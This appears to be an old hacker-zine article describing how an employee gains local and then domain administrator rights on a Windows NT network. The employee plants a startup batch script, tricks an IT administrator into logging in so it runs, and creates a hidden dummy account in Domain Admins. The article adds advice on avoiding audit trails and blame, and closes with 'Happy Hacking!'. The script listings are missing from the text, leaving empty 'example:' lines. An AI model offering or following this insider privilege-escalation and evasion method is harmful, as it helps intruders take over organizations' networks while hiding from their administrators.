Hacking an NT Domain from the Desktop
by Hi_RISC
One day, not so long ago, I was sitting in my cubicle pecking away at the keyboard as I was supposed to be doing. Then I noticed something. The date/time on my computer was incorrect.
After a couple of "Access Denied" error messages, I gave up on trying to fix it, but sort of felt perturbed. "Do they really think that I am that incompetent that I cannot even manage to change the time on my own machine without screwing things up?" Needless to say, this started the ball rolling.
The work I was doing was Helpdesk phone support for a large OEM producer. I figured myself to be reasonably intelligent as well as knowledgeable about the workings of Windows NT and Windows 95/98. I was also beginning work on my MCSE, so I had the reference material available for any situation.
After a little reading, I decided to make myself a Local Administrator of my box, just so I could change the time when I liked, to whatever I liked.
All Windows NT administration can be done via the command line, though not many are doing it these days. It's easy enough to create a script to add yourself to the local admin group, but how do you get the script to run, and with the proper authority? It's easier than it may sound, but let's look at the script first.
This is my example:
The method of getting this script to execute and with the proper authority is simple. All I did was contact my own IT professional within the organization (who only needs to have administrator privileges) and informed him of my date/time issue. He said he'd be there momentarily, so I quickly named the script LOGIN.BAT and threw it in the c:\Winnt\Profiles\All Users\Start Menu\Program\Startup directory so that it would execute.
As he logged in, I tried to distract him a little so he wouldn't notice that a second script was running. It worked like a charm. I could now install and remove drivers, change the time, and even adjust the Desktop settings. Not too much down the road, I left that organization to get some real hands on experience with networking and the related OSes. My Windows NT experience has grown tremendously and I realized that this gaping hole in Microsoft's security is translatable into something much more lethal (though not fully condoned).
How difficult would it be to completely hack an Windows NT domain from the inside? Ironically, it's just as easy as hacking the Workstation.
In order to keep from getting caught, I recommend creating a dummy account so that it's not traceable to you through auditing. If someone were to check the accounts in the Domain Admins group and your username showed, there would probably be a lot of "'splaining to do" but if, say, the Guest account or some other inconspicuous account showed, who would they blame it on? Only themselves.
First, the script should add a user (not necessary if you're going to use the guest account):
This creates an account with the password of password on the domain controller and makes it an active account (not disabled).
Next, we need to add you to the Local Administrators group just as before:
Finally, we take the dummy account and add it to the Domain Admins group as well as remove it from the Guests group (in case it's locked out of anything):
So in effect, we have created a nameless user account with a simple password and added it into the Local Administrator group, the domain administrator group, and removed it from the guest group. All in all, not bad for five lines of script.
Here is the finished product:
This makes for an excellent "sudden" attack in that it may not be uncovered for a range of days to even weeks afterward.
Being an Windows NT admin now, I would recommend that you not use the same user name twice and not use your own PC. This activity is logged and you don't want a trail.
Happy Hacking!